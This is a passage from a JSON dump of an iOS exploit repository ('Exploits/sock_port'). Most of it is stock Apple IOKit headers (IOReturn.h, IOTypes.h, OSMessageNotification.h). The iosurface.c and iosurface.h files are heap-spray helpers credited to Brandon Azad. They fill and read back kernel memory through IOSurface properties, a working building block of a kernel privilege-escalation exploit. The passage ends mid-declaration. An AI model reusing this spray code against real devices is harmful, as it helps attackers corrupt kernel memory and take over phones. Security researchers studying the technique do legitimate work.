kIOReturnNotReady        iokit_common_err(0x2d8) // not ready \n#define 
kIOReturnNotAttached     iokit_common_err(0x2d9) // device not attached \n#define kIOReturnNoChannels      iokit_common_err(0x2da) // no DMA channels left\n#define kIOReturnNoSpace         iokit_common_err(0x2db) // no space for data \n//#define kIOReturn???Error      iokit_common_err(0x2dc) // ??? \n#define kIOReturnPortExists      iokit_common_err(0x2dd) // port already exists\n#define kIOReturnCannotWire      iokit_common_err(0x2de) // can't wire down \n                                                         //   physical memory\n#define kIOReturnNoInterrupt     iokit_common_err(0x2df) // no interrupt attached\n#define kIOReturnNoFrames        iokit_common_err(0x2e0) // no DMA frames enqueued\n#define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received\n                                                         //   on interrupt port\n#define kIOReturnNotPermitted    iokit_common_err(0x2e2) // not permitted\n#define kIOReturnNoPower         iokit_common_err(0x2e3) // no power to device\n#define kIOReturnNoMedia         iokit_common_err(0x2e4) // media not present\n#define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted\n#define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode\n#define kIOReturnUnderrun        iokit_common_err(0x2e7) // data underrun\n#define kIOReturnOverrun         iokit_common_err(0x2e8) // data overrun\n#define kIOReturnDeviceError\t iokit_common_err(0x2e9) // the device is not working properly!\n#define kIOReturnNoCompletion\t iokit_common_err(0x2ea) // a completion routine is required\n#define kIOReturnAborted\t iokit_common_err(0x2eb) // operation aborted\n#define kIOReturnNoBandwidth\t iokit_common_err(0x2ec) // bus bandwidth would be exceeded\n#define kIOReturnNotResponding\t iokit_common_err(0x2ed) // device not responding\n#define kIOReturnIsoTooOld\t iokit_common_err(0x2ee) // isochronous I/O request for distant past!\n#define kIOReturnIsoTooNew\t iokit_common_err(0x2ef) // 
isochronous I/O request for distant future\n#define kIOReturnNotFound        iokit_common_err(0x2f0) // data was not found\n#define kIOReturnInvalid         iokit_common_err(0x1)   // should never be seen\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IORETURN_H */\n"
  },
  {
    "path": "Exploits/sock_port/include/IOKit/IOTypes.h",
    "content": "/*\n * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef\t__IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#if KERNEL\n#include <IOKit/system.h>\n#else\n#include <mach/message.h>\n#include <mach/vm_types.h>\n#endif\n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#ifndef\tNULL\n#if defined (__cplusplus)\n#define\tNULL\t0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n\t\n/*\n * Simple data types.\n */\n#ifndef __MACTYPES__\t/* CF MacTypes.h */\n#ifndef __TYPES__\t/* guess... 
Mac Types.h */\n\n#include <stdbool.h>\n#include <libkern/OSTypes.h>\n\n#endif /* __TYPES__ */\n#endif /* __MACTYPES__ */\n\n#if KERNEL\n#include <libkern/OSBase.h>\n#endif\n\ntypedef UInt32\t\tIOOptionBits;\ntypedef SInt32\t\tIOFixed;\ntypedef UInt32\t\tIOVersion;\ntypedef UInt32\t\tIOItemCount;\ntypedef UInt32  \tIOCacheMode;\n\ntypedef UInt32\t \tIOByteCount32;\ntypedef UInt64\t \tIOByteCount64;\n\ntypedef UInt32\tIOPhysicalAddress32;\ntypedef UInt64\tIOPhysicalAddress64;\ntypedef UInt32\tIOPhysicalLength32;\ntypedef UInt64\tIOPhysicalLength64;\n\n#ifdef __LP64__\ntypedef mach_vm_address_t\tIOVirtualAddress;\n#else\ntypedef vm_address_t\t\tIOVirtualAddress;\n#endif\n\n#if defined(__LP64__) && defined(KERNEL)\ntypedef IOByteCount64\t\tIOByteCount;\n#else\ntypedef IOByteCount32\t \tIOByteCount;\n#endif\n\ntypedef IOVirtualAddress    IOLogicalAddress;\n\n#if defined(__LP64__) && defined(KERNEL)\n\ntypedef IOPhysicalAddress64\t IOPhysicalAddress;\ntypedef IOPhysicalLength64\t IOPhysicalLength;\n#define IOPhysical32( hi, lo )\t\t((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize\t64\n\n#else\n\ntypedef IOPhysicalAddress32\t IOPhysicalAddress;\ntypedef IOPhysicalLength32\t IOPhysicalLength;\n#define IOPhysical32( hi, lo )\t\t(lo)\n#define IOPhysSize\t32\n\n#endif\n\n\ntypedef struct\n{\n    IOPhysicalAddress\taddress;\n    IOByteCount\t\tlength;\n} IOPhysicalRange;\n\ntypedef struct \n{\n    IOVirtualAddress\taddress;\n    IOByteCount\t\tlength;\n} IOVirtualRange;\n\n#ifdef __LP64__\ntypedef IOVirtualRange\tIOAddressRange;\n#else /* !__LP64__ */\ntypedef struct \n{\n    mach_vm_address_t\taddress;\n    mach_vm_size_t\tlength;\n} IOAddressRange;\n#endif /* !__LP64__ */\n\n/*\n * Map between #defined or enum'd constants and text description.\n */\ntypedef struct {\n\tint value;\n\tconst char *name;\n} IONamedValue;\n\n\n/*\n * Memory alignment -- specified as a power of two.\n */\ntypedef unsigned int\tIOAlignment;\n\n#define 
IO_NULL_VM_TASK\t\t((vm_task_t)0)\n\n\n/*\n * Pull in machine specific stuff.\n */\n\n//#include <IOKit/machine/IOTypes.h>\n\n#ifndef MACH_KERNEL\n\n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n#ifdef KERNEL\ntypedef struct OSObject * io_object_t;\n#else /* KERNEL */\ntypedef mach_port_t\tio_object_t;\n#endif /* KERNEL */\n#endif /* __IOKIT_PORTS_DEFINED__ */\n\n#include <device/device_types.h>\n\ntypedef io_object_t\tio_connect_t;\ntypedef io_object_t\tio_enumerator_t;\ntypedef io_object_t\tio_iterator_t;\ntypedef io_object_t\tio_registry_entry_t;\ntypedef io_object_t\tio_service_t;\n\n#define\tIO_OBJECT_NULL\t((io_object_t) 0)\n\n#endif /* MACH_KERNEL */\n\n// IOConnectMapMemory memoryTypes\nenum {\n    kIODefaultMemoryType\t= 0\n};\n\nenum {\n    kIODefaultCache\t\t= 0,\n    kIOInhibitCache\t\t= 1,\n    kIOWriteThruCache\t\t= 2,\n    kIOCopybackCache\t\t= 3,\n    kIOWriteCombineCache\t= 4\n};\n\n// IOMemory mapping options\nenum {\n    kIOMapAnywhere\t\t= 0x00000001,\n\n    kIOMapCacheMask\t\t= 0x00000700,\n    kIOMapCacheShift\t\t= 8,\n    kIOMapDefaultCache\t\t= kIODefaultCache      << kIOMapCacheShift,\n    kIOMapInhibitCache\t\t= kIOInhibitCache      << kIOMapCacheShift,\n    kIOMapWriteThruCache\t= kIOWriteThruCache    << kIOMapCacheShift,\n    kIOMapCopybackCache\t\t= kIOCopybackCache     << kIOMapCacheShift,\n    kIOMapWriteCombineCache\t= kIOWriteCombineCache << kIOMapCacheShift,\n\n    kIOMapUserOptionsMask\t= 0x00000fff,\n\n    kIOMapReadOnly\t\t= 0x00001000,\n\n    kIOMapStatic\t\t= 0x01000000,\n    kIOMapReference\t\t= 0x02000000,\n    kIOMapUnique\t\t= 0x04000000\n#ifdef XNU_KERNEL_PRIVATE\n    , kIOMap64Bit\t\t= 0x08000000\n#endif\n};\n\n/*! 
@enum Scale Factors\n    @discussion Used when a scale_factor parameter is required to define a unit of time.\n    @constant kNanosecondScale Scale factor for nanosecond based times.\n    @constant kMicrosecondScale Scale factor for microsecond based times.\n    @constant kMillisecondScale Scale factor for millisecond based times.\n    @constant kTickScale Scale factor for the standard (100Hz) tick.\n    @constant kSecondScale Scale factor for second based times. */\n\nenum {\n    kNanosecondScale  = 1,\n    kMicrosecondScale = 1000,\n    kMillisecondScale = 1000 * 1000,\n    kSecondScale      = 1000 * 1000 * 1000,\n    kTickScale        = (kSecondScale / 100)\n};\n\n/* compatibility types */\n\n#ifndef KERNEL\n\ntypedef unsigned int IODeviceNumber;\n\n#endif\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n"
  },
  {
    "path": "Exploits/sock_port/include/IOKit/OSMessageNotification.h",
    "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this\n * file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc.  All rights reserved. 
\n *\n * HISTORY\n *\n */\n\n#ifndef\t__OS_OSMESSAGENOTIFICATION_H\n#define __OS_OSMESSAGENOTIFICATION_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include <mach/mach_types.h>\n#include \"IOReturn.h\"\n\nenum {\n    kFirstIOKitNotificationType \t\t= 100,\n    kIOServicePublishNotificationType \t\t= 100,\n    kIOServiceMatchedNotificationType\t\t= 101,\n    kIOServiceTerminatedNotificationType\t= 102,\n    kIOAsyncCompletionNotificationType\t\t= 150,\n    kIOServiceMessageNotificationType\t\t= 160,\n    kLastIOKitNotificationType \t\t\t= 199\n};\n\nenum {\n    kOSNotificationMessageID\t\t= 53,\n    kOSAsyncCompleteMessageID\t\t= 57,\n    kMaxAsyncArgs\t\t\t= 16\n};\n\nenum {\n    kIOAsyncReservedIndex \t= 0,\n    kIOAsyncReservedCount,\n\n    kIOAsyncCalloutFuncIndex \t= kIOAsyncReservedCount,\n    kIOAsyncCalloutRefconIndex,\n    kIOAsyncCalloutCount,\n\n    kIOMatchingCalloutFuncIndex\t= kIOAsyncReservedCount,\n    kIOMatchingCalloutRefconIndex,\n    kIOMatchingCalloutCount,\n    \n    kIOInterestCalloutFuncIndex\t= kIOAsyncReservedCount,\n    kIOInterestCalloutRefconIndex,\n    kIOInterestCalloutServiceIndex,\n    kIOInterestCalloutCount\n};\n\nenum {\n    kOSAsyncRefCount\t= 8,\n    kOSAsyncRefSize \t= 32\n};\ntypedef natural_t OSAsyncReference[kOSAsyncRefCount];\n\nstruct OSNotificationHeader {\n    vm_size_t\t\tsize;\t\t/* content size */\n    natural_t\t\ttype;\n    OSAsyncReference\treference;\n\n#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)\n    unsigned char\tcontent[];\n#else\n    unsigned char\tcontent[0];\n#endif\n};\n\nstruct IOServiceInterestContent {\n    natural_t\tmessageType;\n    void *\tmessageArgument[1];\n};\n\nstruct IOAsyncCompletionContent {\n    IOReturn result;\n#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)\n    void * args[];\n#else\n    void * args[0];\n#endif\n};\n\n#ifndef __cplusplus\ntypedef struct OSNotificationHeader OSNotificationHeader;\ntypedef struct IOServiceInterestContent 
IOServiceInterestContent;\ntypedef struct IOAsyncCompletionContent IOAsyncCompletionContent;\n#endif\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /*  __OS_OSMESSAGENOTIFICATION_H */\n\n"
  },
  {
    "path": "Exploits/sock_port/iosurface.c",
    "content": "/*\n * iosurface.c\n * Brandon Azad\n */\n#define IOSURFACE_EXTERN\n#include \"iosurface.h\"\n\n// ---- Global variables --------------------------------------------------------------------------\n\n// Is the IOSurface subsystem initialized?\nstatic bool IOSurface_initialized;\n\n// ---- Functions ---------------------------------------------------------------------------------\n\n#define ERROR(str, ...) printf(\"IOSurface: \"str, ##__VA_ARGS__)\nbool\nIOSurface_init() {\n\tif (IOSurface_initialized) {\n\t\treturn true;\n\t}\n\tIOSurfaceRoot = IOServiceGetMatchingService(\n\t\t\tkIOMasterPortDefault,\n\t\t\tIOServiceMatching(\"IOSurfaceRoot\"));\n\tif (IOSurfaceRoot == MACH_PORT_NULL) {\n\t\tERROR(\"IOSurface: Could not find %s\", \"IOSurfaceRoot\");\n\t\treturn false;\n\t}\n\tkern_return_t kr = IOServiceOpen(\n\t\t\tIOSurfaceRoot,\n\t\t\tmach_task_self(),\n\t\t\t0,\n\t\t\t&IOSurfaceRootUserClient);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: could not open %s\", \"IOSurfaceRootUserClient\");\n\t\treturn false;\n\t}\n\tstruct _IOSurfaceFastCreateArgs create_args = { .alloc_size = 0x4000, };\n\tstruct IOSurfaceLockResult lock_result;\n    \n    extern uint32_t create_outsize;\n\tsize_t lock_result_size = create_outsize;\n\tkr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t6, // create_surface_client_fast_path\n\t\t\tNULL, 0,\n\t\t\t&create_args, sizeof(create_args),\n\t\t\tNULL, NULL,\n\t\t\t&lock_result, &lock_result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: could not create %s: 0x%x\", \"IOSurfaceClient\", kr);\n\t\treturn false;\n\t}\n\tIOSurface_id = lock_result.surface_id;\n    if (!IOSurface_id) {\n        IOSurface_id = (uint32_t)lock_result.addr3;\n    }\n\tIOSurface_initialized = true;\n\treturn true;\n}\n\nvoid\nIOSurface_deinit() {\n\tassert(IOSurface_initialized);\n\tIOSurface_initialized = false;\n\tIOSurface_id = 
0;\n\tIOServiceClose(IOSurfaceRootUserClient);\n\tIOObjectRelease(IOSurfaceRoot);\n}\n\n/*\n * IOSurface_set_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::set_value().\n */\nbool\nIOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) {\n\tstruct IOSurfaceValueResultArgs result;\n\tsize_t result_size = sizeof(result);\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t9, // set_value\n\t\t\tNULL, 0,\n\t\t\targs, args_size,\n\t\t\tNULL, NULL,\n\t\t\t&result, &result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"set\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * IOSurface_get_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::get_value().\n */\nstatic bool\nIOSurface_get_value(const struct IOSurfaceValueArgs *in, size_t in_size,\n\t\tstruct IOSurfaceValueArgs *out, size_t *out_size) {\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t10, // get_value\n\t\t\tNULL, 0,\n\t\t\tin, in_size,\n\t\t\tNULL, NULL,\n\t\t\tout, out_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"get\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * IOSurface_remove_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::remove_value().\n */\nstatic bool\nIOSurface_remove_value(const struct IOSurfaceValueArgs *args, size_t args_size) {\n\tstruct IOSurfaceValueResultArgs result;\n\tsize_t result_size = sizeof(result);\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t11, // remove_value\n\t\t\tNULL, 0,\n\t\t\targs, args_size,\n\t\t\tNULL, NULL,\n\t\t\t&result, &result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"remove\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * base255_encode\n 
*\n * Description:\n * \tEncode an integer so that it does not contain any null bytes.\n */\nstatic uint32_t\nbase255_encode(uint32_t value) {\n\tuint32_t encoded = 0;\n\tfor (unsigned i = 0; i < sizeof(value); i++) {\n\t\tencoded |= ((value % 255) + 1) << (8 * i);\n\t\tvalue /= 255;\n\t}\n\treturn encoded;\n}\n\n/*\n * xml_units_for_data_size\n *\n * Description:\n * \tReturn the number of XML units needed to store the given size of data in an OSString.\n */\nstatic size_t\nxml_units_for_data_size(size_t data_size) {\n\treturn ((data_size - 1) + sizeof(uint32_t) - 1) / sizeof(uint32_t);\n}\n\n/*\n * serialize_IOSurface_data_array\n *\n * Description:\n * \tCreate the template of the serialized array to pass to IOSurfaceUserClient::set_value().\n * \tReturns the size of the serialized data in bytes.\n */\nstatic size_t\nserialize_IOSurface_data_array(uint32_t *xml0, uint32_t array_length, uint32_t data_size,\n\t\tuint32_t **xml_data, uint32_t **key) {\n\tuint32_t *xml = xml0;\n\t*xml++ = kOSSerializeBinarySignature;\n\t*xml++ = kOSSerializeArray | 2 | kOSSerializeEndCollection;\n\t*xml++ = kOSSerializeArray | array_length;\n\tfor (size_t i = 0; i < array_length; i++) {\n\t\tuint32_t flags = (i == array_length - 1 ? 
kOSSerializeEndCollection : 0);\n\t\t*xml++ = kOSSerializeData | (data_size - 1) | flags;\n\t\txml_data[i] = xml;\n\t\txml += xml_units_for_data_size(data_size);\n\t}\n\t*xml++ = kOSSerializeSymbol | sizeof(uint32_t) + 1 | kOSSerializeEndCollection;\n\t*key = xml++;\t\t// This will be filled in on each array loop.\n\t*xml++ = 0;\t\t// Null-terminate the symbol.\n\treturn (xml - xml0) * sizeof(*xml);\n}\n\n/*\n * IOSurface_spray_with_gc_internal\n *\n * Description:\n * \tA generalized version of IOSurface_spray_with_gc() and IOSurface_spray_size_with_gc().\n */\n\nstatic uint32_t total_arrays = 0;\nstatic bool\nIOSurface_spray_with_gc_internal(uint32_t array_count, uint32_t array_length, uint32_t extra_count,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(array_count <= 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tassert(extra_count < array_count);\n\t// Make sure our IOSurface is initialized.\n\tbool ok = IOSurface_init();\n\tif (!ok) {\n\t\treturn 0;\n\t}\n\t// How big will our OSUnserializeBinary dictionary be?\n\tuint32_t current_array_length = array_length + (extra_count > 0 ? 1 : 0);\n\tsize_t xml_units_per_data = xml_units_for_data_size(data_size);\n\tsize_t xml_units = 1 + 1 + 1 + (1 + xml_units_per_data) * current_array_length + 1 + 1 + 1;\n\t// Allocate the args struct.\n\tstruct IOSurfaceValueArgs *args;\n\tsize_t args_size = sizeof(*args) + xml_units * sizeof(args->xml[0]);\n\targs = malloc(args_size);\n\tassert(args != 0);\n\t// Build the IOSurfaceValueArgs.\n\targs->surface_id = IOSurface_id;\n\t// Create the serialized OSArray. 
We'll remember the locations we need to fill in with our\n\t// data as well as the slot we need to set our key.\n\tuint32_t **xml_data = malloc(current_array_length * sizeof(*xml_data));\n\tassert(xml_data != NULL);\n\tuint32_t *key;\n\tsize_t xml_size = serialize_IOSurface_data_array(args->xml,\n\t\t\tcurrent_array_length, data_size, xml_data, &key);\n\tassert(xml_size == xml_units * sizeof(args->xml[0]));\n\t// Keep track of when we need to do GC.\n\tsize_t sprayed = 0;\n\tsize_t next_gc_step = 0;\n\t// Loop through the arrays.\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\t// If we've crossed the GC sleep boundary, sleep for a bit and schedule the\n\t\t// next one.\n\t\t// Now build the array and its elements.\n\t\t*key = base255_encode(total_arrays + array_id);\n\t\tfor (uint32_t data_id = 0; data_id < current_array_length; data_id++) {\n\t\t\t// Update the data for this spray if the user requested.\n\t\t\tif (callback != NULL) {\n\t\t\t\tcallback(array_id, data_id, data, data_size);\n\t\t\t}\n\t\t\t// Copy in the data to the appropriate slot.\n\t\t\tmemcpy(xml_data[data_id], data, data_size - 1);\n\t\t}\n\t\t// Finally set the array in the surface.\n\t\tok = IOSurface_set_value(args, args_size);\n\t\tif (!ok) {\n\t\t\tfree(args);\n\t\t\tfree(xml_data);\n\t\t\treturn false;\n\t\t}\n\t\tif (ok) {\n\t\t\tsprayed += data_size * current_array_length;\n\t\t\t// If we just sprayed an array with an extra element, decrement the\n\t\t\t// outstanding extra_count.\n\t\t\tif (current_array_length > array_length) {\n\t\t\t\tassert(extra_count > 0);\n\t\t\t\textra_count--;\n\t\t\t\t// If our extra_count is now 0, rebuild our serialized array. 
(We\n\t\t\t\t// could implement this as a memmove(), but I'm lazy.)\n\t\t\t\tif (extra_count == 0) {\n\t\t\t\t\tcurrent_array_length--;\n\t\t\t\t\tserialize_IOSurface_data_array(args->xml,\n\t\t\t\t\t\t\tcurrent_array_length, data_size,\n\t\t\t\t\t\t\txml_data, &key);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tif (next_gc_step > 0) {\n\t\t// printf(\"\\n\");\n\t}\n\t// Clean up resources.\n\tfree(args);\n\tfree(xml_data);\n\ttotal_arrays += array_count;\n\treturn true;\n}\n\nbool\nIOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\treturn IOSurface_spray_with_gc_internal(array_count, array_length, 0,\n\t\t\tdata, data_size, callback);\n}\n\nbool\nIOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(array_count <= 0xffffff);\n\tassert(data_size <= 0xffffff);\n\tsize_t data_count = (spray_size + data_size - 1) / data_size;\n\tsize_t array_length = data_count / array_count;\n\tsize_t extra_count = data_count % array_count;\n\tassert(array_length <= 0xffff);\n\treturn IOSurface_spray_with_gc_internal(array_count, (uint32_t) array_length,\n\t\t\t(uint32_t) extra_count, data, data_size, callback);\n}\n\nbool\nIOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t data_id, void *data, size_t size)) {\n\tassert(IOSurface_initialized);\n\tassert(array_id < 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tbool success = false;\n\t// Create the input args.\n\tstruct IOSurfaceValueArgs_string args_in = {};\n\targs_in.surface_id = IOSurface_id;\n\targs_in.string_data = base255_encode(array_id);\n\t// Create the output args.\n\tsize_t xml_units_per_data = xml_units_for_data_size(data_size);\n\tsize_t 
xml_units = 1 + 1 + (1 + xml_units_per_data) * array_length;\n\tstruct IOSurfaceValueArgs *args_out;\n\tsize_t args_out_size = sizeof(*args_out) + xml_units * sizeof(args_out->xml[0]);\n\t// Over-allocate the output buffer a little bit. This allows us to directly pass the inline\n\t// data to the client without having to worry about the fact that the kernel data is 1 byte\n\t// shorter (which otherwise would produce an out-of-bounds read on the last element for\n\t// certain data sizes). Yeah, it's a hack, deal with it.\n\targs_out = malloc(args_out_size + sizeof(uint32_t));\n\tassert(args_out != 0);\n\t// Get the value.\n\tbool ok = IOSurface_get_value((struct IOSurfaceValueArgs *)&args_in, sizeof(args_in),\n\t\t\targs_out, &args_out_size);\n\tif (!ok) {\n\t\tgoto fail;\n\t}\n\t// Do the ugly parsing ourselves. :(\n\tuint32_t *xml = args_out->xml;\n\tif (*xml++ != kOSSerializeBinarySignature) {\n\t\tERROR(\"IOSurface: did not find OSSerializeBinary signature\");\n\t\tgoto fail;\n\t}\n\tif (*xml++ != (kOSSerializeArray | array_length | kOSSerializeEndCollection)) {\n\t\tERROR(\"IOSurface: unexpected container\");\n\t\tgoto fail;\n\t}\n\tfor (uint32_t data_id = 0; data_id < array_length; data_id++) {\n\t\tuint32_t flags = (data_id == array_length - 1 ? 
kOSSerializeEndCollection : 0);\n\t\tif (*xml++ != (kOSSerializeString | data_size - 1 | flags)) {\n            ERROR(\"IOSurface: unexpected data: 0x%x != 0x%x at index %u\",\n\t\t\t\t\txml[-1], kOSSerializeString | data_size - 1 | flags,\n\t\t\t\t\tdata_id);\n\t\t\tgoto fail;\n\t\t}\n\t\tcallback(data_id, (void *)xml, data_size);\n\t\txml += xml_units_per_data;\n\t}\n\tsuccess = true;\nfail:\n\tfree(args_out);\n\treturn success;\n}\n\nbool\nIOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) {\n\tassert(IOSurface_initialized);\n\tassert(array_count <= 0xffffff);\n\tassert(array_length <= 0xffff);\n\tassert(data_size <= 0xffffff);\n\tbool ok = true;\n\t//TODO: We should probably amortize the creation of the output buffer.\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\tok &= IOSurface_spray_read_array(array_id, array_length, data_size,\n\t\t\t\t^(uint32_t data_id, void *data, size_t size) {\n\t\t\tcallback(array_id, data_id, data, size);\n\t\t});\n\t}\n\treturn ok;\n}\n\nbool\nIOSurface_spray_remove_array(uint32_t array_id) {\n\tassert(IOSurface_initialized);\n\tassert(array_id < 0xffffff);\n\tstruct IOSurfaceValueArgs_string args = {};\n\targs.surface_id = IOSurface_id;\n\targs.string_data = base255_encode(array_id);\n\treturn IOSurface_remove_value((struct IOSurfaceValueArgs *)&args, sizeof(args));\n}\n\nbool\nIOSurface_spray_clear(uint32_t array_count) {\n\tassert(IOSurface_initialized);\n\tassert(array_count <= 0xffffff);\n\tbool ok = true;\n\tfor (uint32_t array_id = 0; array_id < array_count; array_id++) {\n\t\tok &= IOSurface_spray_remove_array(array_id);\n\t}\n\treturn ok;\n}\n"
  },
  {
    "path": "Exploits/sock_port/iosurface.h",
    "content": "/*\n * iosurface.h\n * Brandon Azad\n */\n#ifndef VOUCHER_SWAP__IOSURFACE_H_\n#define VOUCHER_SWAP__IOSURFACE_H_\n\n#include <mach/mach.h>\n#include <stdio.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <assert.h>\n#include <pthread.h>\n#include \"../sock_port/include/IOKit/IOKitLib.h\"\n\n#include \"exploit_utilities.h\"\n\n#ifdef IOSURFACE_EXTERN\n#define extern IOSURFACE_EXTERN\n#endif\n\n// The IOSurfaceRoot service.\nextern mach_port_t IOSurfaceRoot;\n\n// An IOSurfaceRootUserClient instance.\nextern mach_port_t IOSurfaceRootUserClient;\n\n// The ID of the IOSurface we're using.\nextern uint32_t IOSurface_id;\n\n/*\n * IOSurface_init\n *\n * Description:\n * \tInitialize the IOSurface subsystem.\n */\nbool IOSurface_init(void);\n\n/*\n * IOSurface_deinit\n *\n * Description:\n * \tTear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.\n */\nvoid IOSurface_deinit(void);\n\n/*\n * IOSurface_spray_with_gc\n *\n * Description:\n * \tSpray kernel memory using IOSurface properties.\n *\n * \tThe current implementation stores each data allocation in an OSString. The reason for this\n * \tis that OSString contents will be allocated using kalloc() even for allocations larger than\n * \tthe page size. 
OSData on the other hand will use kmem_alloc() for large allocations.\n * \tConsequently, the last byte of data will be zeroed out to create a null terminator.\n */\nbool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_size_with_gc\n *\n * Description:\n * \tSpray kernel memory using IOSurface properties.\n *\n * \tThis function computes the number of elements per array automatically.\n */\nbool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,\n\t\tvoid *data, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_read_array\n *\n * Description:\n * \tRead back the data elements in a particular array in a particular IOSurface spray.\n */\nbool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_read_all_data\n *\n * Description:\n * \tRead back all the data elements in an IOSurface spray.\n */\nbool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,\n\t\tvoid (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));\n\n/*\n * IOSurface_spray_remove_array\n *\n * Description:\n * \tRemove a particular array from an IOSurface spray, freeing the contained data elements.\n */\nbool 